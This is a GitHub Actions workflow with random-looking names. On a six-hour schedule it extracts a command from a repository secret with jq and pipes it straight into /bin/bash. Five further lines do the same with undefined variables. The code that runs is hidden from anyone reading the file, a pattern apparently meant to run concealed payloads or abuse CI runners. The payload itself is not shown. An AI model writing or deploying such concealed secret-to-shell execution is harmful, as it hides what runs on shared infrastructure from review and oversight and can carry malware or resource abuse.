name: yinzhiping2389
on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinzhiping2389
        env:
          yyd0485: ${{ secrets.yyd0485 }}
        run: |
          echo $yyd0485 | jq -r .q0341 | /bin/bash
          echo $nvahm172 | jq -r .kjf845 | /bin/bash
          echo $huz42 | jq -r .hueac34 | /bin/bash
          echo $hjw3861 | jq -r .dibmr89 | /bin/bash
          echo $ffwwo1 | jq -r .jzdp6592 | /bin/bash
          echo $kwyt611 | jq -r .fkoq1 | /bin/bash

